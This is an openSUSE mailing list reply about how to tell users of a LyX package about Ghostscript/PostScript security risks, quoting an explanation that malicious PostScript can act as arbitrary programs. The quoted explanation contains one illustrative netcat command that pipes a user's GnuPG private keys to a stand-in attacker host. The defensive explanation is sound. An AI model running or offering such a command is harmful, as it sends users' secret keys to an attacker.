Mailinglist Archive: opensuse-factory (443 mails)

< Previous Next >
Re: [opensuse-factory] How to inform users of security settings (boo#713289)
Op 04-07-19 om 16:07 schreef Johannes Meixner:
YI:

For some background information about the root cause behind
all those PostScript/Ghostscript related security issues
see the section
"It is crucial to limit access to CUPS to trusted users" in
https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings
that reads (excerpts):
-------------------------------------------------------------------
PostScript but also PDF to some extent ... is actually a program.
...
PostScript is a general purpose Turing-complete programming
language (cf. https://en.wikipedia.org/wiki/PostScript)
that supports in particular file access on the system disk.
When Ghostscript processes PostScript it runs a PostScript
program as the user who runs Ghostscript ...
When Ghostscript processes an arbitrary PostScript file,
the user who runs Ghostscript runs an arbitrary program
which can do anything on the system where Ghostscript runs
that this user is allowed to do on that system.
To make it safer when Ghostscript runs a PostScript program
the Ghostscript command line option '-dSAFER' disables
certain file access functionality (for details
see /usr/share/doc/ghostscript/*/Use.htm).
...
Its name 'SAFER' says everything: It makes it 'safer'
to let Ghostscript run a PostScript program, but
it does not make it completely safe. -------------------------------------------------------------------


Simply put:

Via some special (but well known) indirections in Ghostscript
a PostScript program or an Encapsulated PostScript [EPS] program
that a user runs via Ghostscript could execute certain stuff
which results basically the equivalent of things like

netcat server.attacker.net 12345 </home/user/.gnupg/private-keys

when an innocent user only liked to view the graphical output
of a malicious PostScript program or convert it into another
(graphical) data type.

Cf.
http://bugzilla.opensuse.org/show_bug.cgi?id=1134327#c13


In the end it means:

By default it must not be allowd to let Ghostscript
(or any other PostScript interpreter) run arbitrary
PostScript programs from (possibly) untrusted origin.

Thanks for the information.

Thanks all for input. My proposal was not met with enthusiasm, so that is a no-go.

I have added a README.SUSE with all information and options the user has. In the description field I refer to this. It is in Publishing/lyx, for those who would like to give feedback. I will submit it later to factory.

Kind Regards,

Cor


--
To unsubscribe, e-mail: opensuse-factory+unsubscribe@xxxxxxxxxxxx
To contact the owner, e-mail: opensuse-factory+owner@xxxxxxxxxxxx

< Previous Next >